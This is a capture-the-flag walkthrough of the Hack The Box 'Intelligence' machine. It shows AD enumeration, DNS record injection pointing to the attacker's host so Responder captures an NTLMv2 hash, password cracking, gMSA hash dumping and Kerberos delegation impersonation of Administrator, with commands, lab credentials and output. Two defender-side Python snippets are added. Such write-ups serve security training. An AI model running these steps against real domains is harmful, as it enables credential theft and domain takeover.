index: 0xf72 RID: 0x457 acb: 0x00000210 Account: Michelle.Kent Name: (null) Desc: (null)
index: 0xf77 RID: 0x45c acb: 0x00000210 Account: Nicole.Brock Name: (null) Desc: (null)
index: 0xf7d RID: 0x462 acb: 0x00000210 Account: Richard.Williams Name: (null) Desc: (null)
index: 0xf6d RID: 0x452 acb: 0x00000210 Account: Samuel.Richardson Name: (null) Desc: (null)
index: 0xf6f RID: 0x454 acb: 0x00000210 Account: Scott.Scott Name: (null) Desc: (null)
index: 0xf78 RID: 0x45d acb: 0x00000210 Account: Stephanie.Young Name: (null) Desc: (null)
index: 0xf8f RID: 0x474 acb: 0x00000210 Account: Ted.Graves Name: (null) Desc: (null)
index: 0xf7e RID: 0x463 acb: 0x00000210 Account: Teresa.Williamson Name: (null) Desc: (null)
index: 0xf7b RID: 0x460 acb: 0x00000210 Account: Thomas.Hall Name: (null) Desc: (null)
index: 0xf7a RID: 0x45f acb: 0x00000210 Account: Thomas.Valenzuela Name: (null) Desc: (null)
index: 0xf82 RID: 0x467 acb: 0x00000210 Account: Thomas.Wise Name: (null) Desc: (null)
index: 0xf8a RID: 0x46f acb: 0x00000210 Account: Tiffany.Molina Name: (null) Desc: (null)
index: 0xf75 RID: 0x45a acb: 0x00000210 Account: Travis.Evans Name: (null) Desc: (null)
index: 0xf83 RID: 0x468 acb: 0x00000210 Account: Veronica.Patel Name: (null) Desc: (null)
index: 0xf81 RID: 0x466 acb: 0x00000210 Account: William.Lee Name: (null) Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[Danny.Matthews] rid:[0x44f]
user:[Jose.Williams] rid:[0x450]
user:[Jason.Wright] rid:[0x451]
user:[Samuel.Richardson] rid:[0x452]
user:[David.Mcbride] rid:[0x453]
user:[Scott.Scott] rid:[0x454]
user:[David.Reed] rid:[0x455]
user:[Ian.Duncan] rid:[0x456]
user:[Michelle.Kent] rid:[0x457]
user:[Jennifer.Thomas] rid:[0x458]
user:[Kaitlyn.Zimmerman] rid:[0x459]
user:[Travis.Evans] rid:[0x45a]
user:[Kelly.Long] rid:[0x45b]
user:[Nicole.Brock] rid:[0x45c]
user:[Stephanie.Young] rid:[0x45d]
user:[John.Coleman] rid:[0x45e]
user:[Thomas.Valenzuela] rid:[0x45f]
user:[Thomas.Hall] rid:[0x460]
user:[Brian.Baker] rid:[0x461]
user:[Richard.Williams] rid:[0x462]
user:[Teresa.Williamson] rid:[0x463]
user:[David.Wilson] rid:[0x464]
user:[Darryl.Harris] rid:[0x465]
user:[William.Lee] rid:[0x466]
user:[Thomas.Wise] rid:[0x467]
user:[Veronica.Patel] rid:[0x468]
user:[Joel.Crawford] rid:[0x469]
user:[Jean.Walter] rid:[0x46a]
user:[Anita.Roberts] rid:[0x46b]
user:[Brian.Morris] rid:[0x46c]
user:[Daniel.Shelton] rid:[0x46d]
user:[Jessica.Moody] rid:[0x46e]
user:[Tiffany.Molina] rid:[0x46f]
user:[James.Curbow] rid:[0x470]
user:[Jeremy.Mora] rid:[0x471]
user:[Jason.Patterson] rid:[0x472]
user:[Laura.Lee] rid:[0x473]
user:[Ted.Graves] rid:[0x474]
===============================( Share Enumeration on intelligence.htb )===============================
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on intelligence.htb
//intelligence.htb/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//intelligence.htb/C$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_INVALID_INFO_CLASS listing \*
//intelligence.htb/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//intelligence.htb/IT Mapping: OK Listing: OK Writing: N/A
//intelligence.htb/NETLOGON Mapping: OK Listing: OK Writing: N/A
//intelligence.htb/SYSVOL Mapping: OK Listing: OK Writing: N/A
//intelligence.htb/Users Mapping: OK Listing: OK Writing: N/A
=====================================( Groups on intelligence.htb )=====================================
[+] Getting builtin groups:
group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group: Certificate Service DCOM Access' (RID: 574) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: intelligence\Domain Users
Group: Administrators' (RID: 544) has member: intelligence\Administrator
Group: Administrators' (RID: 544) has member: intelligence\Enterprise Admins
Group: Administrators' (RID: 544) has member: intelligence\Domain Admins
Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: intelligence\DC$
Group: Guests' (RID: 546) has member: intelligence\Guest
Group: Guests' (RID: 546) has member: intelligence\Domain Guests
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group: Cert Publishers' (RID: 517) has member: intelligence\DC$
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\krbtgt
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Domain Controllers
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Schema Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Enterprise Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Cert Publishers
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Domain Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Group Policy Creator Owners
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Read-only Domain Controllers
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[dba] rid:[0x475]
group:[itsupport] rid:[0x476]
group:[sysadmin] rid:[0x477]
[+] Getting domain group memberships:
Group: 'Domain Controllers' (RID: 516) has member: intelligence\DC$
Group: 'Domain Computers' (RID: 515) has member: intelligence\svc_int$
Group: 'Schema Admins' (RID: 518) has member: intelligence\Administrator
Group: 'sysadmin' (RID: 1143) has member: intelligence\Jason.Patterson
Group: 'Domain Users' (RID: 513) has member: intelligence\Administrator
Group: 'Domain Users' (RID: 513) has member: intelligence\krbtgt
Group: 'Domain Users' (RID: 513) has member: intelligence\Danny.Matthews
Group: 'Domain Users' (RID: 513) has member: intelligence\Jose.Williams
Group: 'Domain Users' (RID: 513) has member: intelligence\Jason.Wright
Group: 'Domain Users' (RID: 513) has member: intelligence\Samuel.Richardson
Group: 'Domain Users' (RID: 513) has member: intelligence\David.Mcbride
Group: 'Domain Users' (RID: 513) has member: intelligence\Scott.Scott
Group: 'Domain Users' (RID: 513) has member: intelligence\David.Reed
Group: 'Domain Users' (RID: 513) has member: intelligence\Ian.Duncan
Group: 'Domain Users' (RID: 513) has member: intelligence\Michelle.Kent
Group: 'Domain Users' (RID: 513) has member: intelligence\Jennifer.Thomas
Group: 'Domain Users' (RID: 513) has member: intelligence\Kaitlyn.Zimmerman
Group: 'Domain Users' (RID: 513) has member: intelligence\Travis.Evans
Group: 'Domain Users' (RID: 513) has member: intelligence\Kelly.Long
Group: 'Domain Users' (RID: 513) has member: intelligence\Nicole.Brock
Group: 'Domain Users' (RID: 513) has member: intelligence\Stephanie.Young
Group: 'Domain Users' (RID: 513) has member: intelligence\John.Coleman
Group: 'Domain Users' (RID: 513) has member: intelligence\Thomas.Valenzuela
Group: 'Domain Users' (RID: 513) has member: intelligence\Thomas.Hall
Group: 'Domain Users' (RID: 513) has member: intelligence\Brian.Baker
Group: 'Domain Users' (RID: 513) has member: intelligence\Richard.Williams
Group: 'Domain Users' (RID: 513) has member: intelligence\Teresa.Williamson
Group: 'Domain Users' (RID: 513) has member: intelligence\David.Wilson
Group: 'Domain Users' (RID: 513) has member: intelligence\Darryl.Harris
Group: 'Domain Users' (RID: 513) has member: intelligence\William.Lee
Group: 'Domain Users' (RID: 513) has member: intelligence\Thomas.Wise
Group: 'Domain Users' (RID: 513) has member: intelligence\Veronica.Patel
Group: 'Domain Users' (RID: 513) has member: intelligence\Joel.Crawford
Group: 'Domain Users' (RID: 513) has member: intelligence\Jean.Walter
Group: 'Domain Users' (RID: 513) has member: intelligence\Anita.Roberts
Group: 'Domain Users' (RID: 513) has member: intelligence\Brian.Morris
Group: 'Domain Users' (RID: 513) has member: intelligence\Daniel.Shelton
Group: 'Domain Users' (RID: 513) has member: intelligence\Jessica.Moody
Group: 'Domain Users' (RID: 513) has member: intelligence\Tiffany.Molina
Group: 'Domain Users' (RID: 513) has member: intelligence\James.Curbow
Group: 'Domain Users' (RID: 513) has member: intelligence\Jeremy.Mora
Group: 'Domain Users' (RID: 513) has member: intelligence\Jason.Patterson
Group: 'Domain Users' (RID: 513) has member: intelligence\Laura.Lee
Group: 'Domain Users' (RID: 513) has member: intelligence\Ted.Graves
Group: 'Domain Admins' (RID: 512) has member: intelligence\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: intelligence\Administrator
Group: 'Enterprise Admins' (RID: 519) has member: intelligence\Administrator
Group: 'itsupport' (RID: 1142) has member: intelligence\Laura.Lee
Group: 'itsupport' (RID: 1142) has member: intelligence\Ted.Graves
Group: 'dba' (RID: 1141) has member: intelligence\Jeremy.Mora
Group: 'Domain Guests' (RID: 514) has member: intelligence\Guest
enum4linux complete on Sun Aug 29 21:13:01 2021
With this data, we gained some insight into what information we can obtain once we access the victim machine. For example, along with the users we now also have a domain computer account, intelligence\svc_int$, which is possibly a service account associated with the machine logon.
Gaining Access
As we saw in the last step of our enumeration, three groups look interesting: dba, itsupport, and sysadmin. Their memberships are the following:
[+] Getting domain group memberships:
Group 'dba' (RID: 1141) has member: intelligence\Jeremy.Mora
Group 'itsupport' (RID: 1142) has member: intelligence\Laura.Lee
Group 'itsupport' (RID: 1142) has member: intelligence\Ted.Graves
Group 'sysadmin' (RID: 1143) has member: intelligence\Jason.Patterson
As we can see, we can access the IT, Users, NETLOGON, and SYSVOL shares, but nothing else. Let's start with the Users share and see what we can access.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ smbclient //intelligence.htb/Users -W "intelligence.htb" -U "Tiffany.Molina%NewIntelligenceCorpUser9876"
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\intelligence.htb\Users\
smb: \> ls
. DR 0 Sun Apr 18 21:20:26 2021
.. DR 0 Sun Apr 18 21:20:26 2021
Administrator D 0 Sun Apr 18 20:18:39 2021
All Users DHSrn 0 Sat Sep 15 03:21:46 2018
Default DHR 0 Sun Apr 18 22:17:40 2021
Default User DHSrn 0 Sat Sep 15 03:21:46 2018
desktop.ini AHS 174 Sat Sep 15 03:11:27 2018
Public DR 0 Sun Apr 18 20:18:39 2021
Ted.Graves D 0 Sun Apr 18 21:20:26 2021
Tiffany.Molina D 0 Sun Apr 18 20:51:46 2021
3770367 blocks of size 4096. 1442036 blocks available
smb: \> cd Tiffany.Molina
smb: \Tiffany.Molina\> ls
. D 0 Sun Apr 18 20:51:46 2021
.. D 0 Sun Apr 18 20:51:46 2021
AppData DH 0 Sun Apr 18 20:51:46 2021
Application Data DHSrn 0 Sun Apr 18 20:51:46 2021
Cookies DHSrn 0 Sun Apr 18 20:51:46 2021
Desktop DR 0 Sun Apr 18 20:51:46 2021
Documents DR 0 Sun Apr 18 20:51:46 2021
Downloads DR 0 Sat Sep 15 03:12:33 2018
Favorites DR 0 Sat Sep 15 03:12:33 2018
Links DR 0 Sat Sep 15 03:12:33 2018
Local Settings DHSrn 0 Sun Apr 18 20:51:46 2021
Music DR 0 Sat Sep 15 03:12:33 2018
My Documents DHSrn 0 Sun Apr 18 20:51:46 2021
NetHood DHSrn 0 Sun Apr 18 20:51:46 2021
NTUSER.DAT AHn 131072 Tue Jun 29 16:00:17 2021
ntuser.dat.LOG1 AHS 86016 Sun Apr 18 20:51:46 2021
ntuser.dat.LOG2 AHS 0 Sun Apr 18 20:51:46 2021
NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TM.blf AHS 65536 Sun Apr 18 20:51:46 2021
NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Sun Apr 18 20:51:46 2021
NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Sun Apr 18 20:51:46 2021
ntuser.ini AHS 20 Sun Apr 18 20:51:46 2021
Pictures DR 0 Sat Sep 15 03:12:33 2018
Recent DHSrn 0 Sun Apr 18 20:51:46 2021
Saved Games D 0 Sat Sep 15 03:12:33 2018
SendTo DHSrn 0 Sun Apr 18 20:51:46 2021
Start Menu DHSrn 0 Sun Apr 18 20:51:46 2021
Templates DHSrn 0 Sun Apr 18 20:51:46 2021
Videos DR 0 Sat Sep 15 03:12:33 2018
3770367 blocks of size 4096. 1442036 blocks available
smb: \Tiffany.Molina\> ls Desktop\
. DR 0 Sun Apr 18 20:51:46 2021
.. DR 0 Sun Apr 18 20:51:46 2021
user.txt AR 34 Sun Aug 29 06:35:26 2021
3770367 blocks of size 4096. 1442036 blocks available
smb: \Tiffany.Molina\> get Desktop\user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as Desktop\user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
And so it looks like we got the user flag!
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ cat 'Desktop\user.txt'
492157********************a5477f
Along with this, we can tell who else to look at next: Ted.Graves, a member of itsupport.
From the IT share, we are able to get a PowerShell script:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ smbclient //intelligence.htb/IT -W "intelligence.htb" -U "Tiffany.Molina%NewIntelligenceCorpUser9876"
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Apr 18 20:50:55 2021
.. D 0 Sun Apr 18 20:50:55 2021
downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021
3770367 blocks of size 4096. 1441236 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (5.7 KiloBytes/sec) (average 5.7 KiloBytes/sec)
smb: \> quit
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ cat downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
This PowerShell script enumerates the records of the AD-integrated intelligence.htb DNS zone whose name starts with 'web', requests each of them over HTTP with the credentials of the account running the script (-UseDefaultCredentials), and emails Ted.Graves when a site does not answer with status 200.
At this point, since the script seems to run periodically on the victim machine to check whether the sites are down, I think we can run Responder and let the script authenticate to us. For this, we will use krbrelayx's dnstool to try and create a DNS record under the intelligence.htb domain.
Manipulating DNS and NTLM Hash Capture
Given that the downdetector.ps1 script looks for any record starting with 'web', we add a DNS record of that shape, 'webfoo.intelligence.htb', pointing at our host, and then validate that the DNS record was created.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ python3 /opt/krbrelayx/dnstool.py -u 'intelligence.htb\Tiffany.Molina' \
-p 'NewIntelligenceCorpUser9876' -a add -r 'webfoo.intelligence.htb' \
-d 10.10.14.31 10.129.95.154
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/opt/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ dig @intelligence.htb -t any webfoo.intelligence.htb
; <<>> DiG 9.16.15-Debian <<>>@intelligence.htb webfoo.intelligence.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3892
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;webfoo.intelligence.htb. IN A
;; AUTHORITY SECTION:
intelligence.htb. 3600 IN SOA dc.intelligence.htb. hostmaster.intelligence.htb. 188 900 600 86400 3600
;; Query time: 40 msec
;; SERVER: 10.129.95.154#53(10.129.95.154)
;; WHEN: Sun Aug 29 23:38:29 EDT 2021
;; MSG SIZE rcvd: 118
In another terminal window, we run Responder and wait about 5 minutes for the scheduled script to run; when it resolves webfoo.intelligence.htb to our host and authenticates to it, Responder captures the NTLMv2 response:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ sudo responder -I tun1 -i 10.10.14.31 -A
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [ON]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun1]
Responder IP [10.10.14.31]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-MJOIRCXWJLL]
Responder Domain Name [L8V7.LOCAL]
Responder DCE-RPC Port [47274]
[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.31) is not on the same subnet than the DNS server (10.35.0.1).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.31) is not on the same subnet than the DNS server (192.168.2.1).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.129.95.154
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:64c89b9435433bdf[...]
Here we have the NTLMv2 response for Ted.Graves, which we save to ted_graves.hash for the next step.
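As an added example from the incident-response side (my code, not the write-up's and not Responder's), the following Python decodes a line in Responder's NTLMv2 format: the blob the client returns echoes the AV pairs from the server's challenge, so it records which host challenged the client and when, which is what lets a defender attribute a capture like the one above to a rogue host. The sample line is constructed here (it is not the real capture): it reuses the server challenge shown above and the machine name and domain Responder reported in its session variables, while the NTProofStr and client challenge are placeholder bytes.

```python
import struct
from datetime import datetime, timezone

# MsvAvPair attribute ids from MS-NLMP 2.2.2.1
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            9: "TargetName", 10: "ChannelBindings"}
STRING_AVS = {1, 2, 3, 4, 5, 9}          # UTF-16LE string values
EPOCH_DIFF = 11644473600                  # seconds from 1601-01-01 (FILETIME) to 1970-01-01

def filetime_to_datetime(ft):
    return datetime.fromtimestamp(ft / 10_000_000 - EPOCH_DIFF, tz=timezone.utc)

def parse_av_pairs(data):
    """Decode the AV_PAIR list the server sent in its CHALLENGE_MESSAGE (echoed in the NTLMv2 blob)."""
    pairs, off = {}, 0
    while off + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, off)
        off += 4
        if av_id == 0:                    # MsvAvEOL terminates the list
            break
        value = data[off:off + av_len]
        off += av_len
        name = AV_NAMES.get(av_id, f"Unknown{av_id}")
        if av_id in STRING_AVS:
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 7:
            pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            pairs[name] = value.hex()
    return pairs

def parse_responder_line(line):
    """Split a Responder 'User::Domain:ServerChallenge:NTProofStr:Blob' line and decode the blob."""
    user, _, rest = line.strip().partition("::")
    domain, server_challenge, ntproofstr, blob_hex = rest.split(":", 3)
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":           # RespType / HiRespType of an NTLMv2_CLIENT_CHALLENGE
        raise ValueError("not an NTLMv2 client challenge blob")
    return {
        "user": user, "domain": domain,
        "server_challenge": server_challenge, "ntproofstr": ntproofstr,
        "timestamp": filetime_to_datetime(struct.unpack_from("<Q", blob, 8)[0]),
        "client_challenge": blob[16:24].hex(),
        "target": parse_av_pairs(blob[28:]),   # bytes 24-27 are reserved
    }

def is_foreign_target(parsed, expected_dns_domain):
    """True when the host that challenged the client is outside the expected AD DNS domain."""
    return parsed["target"].get("DnsDomainName", "").lower() != expected_dns_domain.lower()

def _av(av_id, value):
    raw = value.encode("utf-16-le") if isinstance(value, str) else value
    return struct.pack("<HH", av_id, len(raw)) + raw

def build_sample_line():
    """Constructed sample (not a real capture): a Responder-format line whose AV pairs name
    the rogue host Responder identified itself as, WIN-MJOIRCXWJLL in L8V7.LOCAL."""
    when = datetime(2021, 8, 30, 3, 44, 0, tzinfo=timezone.utc)
    filetime = int(when.timestamp() + EPOCH_DIFF) * 10_000_000
    av_pairs = (_av(1, "WIN-MJOIRCXWJLL") + _av(2, "L8V7") + _av(3, "win-mjoircxwjll.l8v7.local")
                + _av(4, "L8V7.LOCAL") + _av(7, struct.pack("<Q", filetime)) + _av(0, b""))
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime)
            + bytes.fromhex("1122334455667788") + b"\x00" * 4 + av_pairs + b"\x00" * 4)
    return "Ted.Graves::intelligence:64c89b9435433bdf:" + "ab" * 16 + ":" + blob.hex()

if __name__ == "__main__":
    result = parse_responder_line(build_sample_line())
    print(result["user"], "authenticated to", result["target"]["NbComputerName"],
          "in", result["target"]["DnsDomainName"], "at", result["timestamp"].isoformat(),
          "foreign:", is_foreign_target(result, "intelligence.htb"))
```

A DnsDomainName that does not match the expected domain, as here, is the tell that a domain account authenticated to a host outside the forest; the Timestamp AV pair also dates the event independently of the capture tool's clock.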
Privilege Escalation
Before proceeding, let's crack this NTLMv2 hash so we can use the password when needed.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt ted_graves.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy (Ted.Graves)
1g 0:00:00:08 DONE (2021-08-29 23:46) 0.1118g/s 1209Kp/s 1209Kc/s 1209KC/s Mrz.browntillthedayidie..Morganstern
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
Now that we have Ted.Graves' password, let's see which shares we can access and with what permissions.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ smbmap -H intelligence.htb -d intelligence.htb -u 'Ted.Graves' -p 'Mr.Teddy'
[+] IP: intelligence.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ ONLY
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY
Inspecting Permissions with BloodHound
Using 'Ted.Graves' does not give us much direct access to the platform, but the LDAP information we obtained through enum4linux suggests there is more to find, so let's gather more information through LDAP using BloodHound and its remote (Python) ingestor.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ bloodhound-python -d intelligence.htb -u Ted.Graves@intelligence.htb -p 'Mr.Teddy' -gc intelligence.htb -c all -ns 10.129.95.154
INFO: Found AD domain: intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The DNS query name does not exist: svc_int.intelligence.htb.
INFO: Done in 00M 08S
In BloodHound, when using the 'Shortest Paths to Unconstrained Delegation Systems' query, we see the ITSUPPORT group can read gMSA (group managed service account) passwords. From our LDAP enumeration and BloodHound, we know 'Ted.Graves' and 'Laura.Lee' are members of this group.

Dump gMSA Password and Request Service Ticket
Of all the things we could attempt at this point, we can dump the svc_int$ password hash, which is readable by our user, with gMSADumper and then request a Kerberos service ticket.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ python3 /opt/gMSADumper/gMSADumper.py -l dc.intelligence.htb -d intelligence.htb -u 'Ted.Graves' -p 'Mr.Teddy'
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::5e47bac787e5e1970cf9acdb5b316239
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ impacket-getST -spn dc.intelligence.htb "intelligence.htb/Ted.Graves:Mr.Teddy@intelligence.htb"
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
The information we passed to the domain controller was not sufficient: our clock has to be as close as possible to the Kerberos server's, and we need to request the ticket as svc_int$, using its hash and a properly specified Service Principal Name.
Notice that we are impersonating the Administrator user, given the 'AllowedToDelegate' permission svc_int$ has, as shown in the BloodHound screenshot.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ sudo ntpdate intelligence.htb
30 Aug 07:46:31 ntpdate[3415]: step time server 10.129.95.154 offset +25069.588326 sec
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ impacket-getST -spn WWW/dc.intelligence.htb "intelligence.htb/svc_int$" -hashes ":5e47bac787e5e1970cf9acdb5b316239" -dc-ip dc.intelligence.htb -impersonate administrator
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
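As an added defender-side example (my code, not part of the write-up or of Impacket), the following Python audits the configuration points the S4U2self/S4U2proxy chain above depends on: an account flagged TRUSTED_TO_AUTH_FOR_DELEGATION with msDS-AllowedToDelegateTo set (constrained delegation with protocol transition, which is what the AllowedToDelegate edge reports), a gMSA whose password is readable by a non-tier-0 group, and a tier-0 user that is neither in Protected Users nor marked "sensitive and cannot be delegated". The entries, the svc_int$ and dc.intelligence.htb values and the gMSA reader list are constructed to mirror this write-up; a real run would take them from an LDAP query and from gMSADumper's output.

```python
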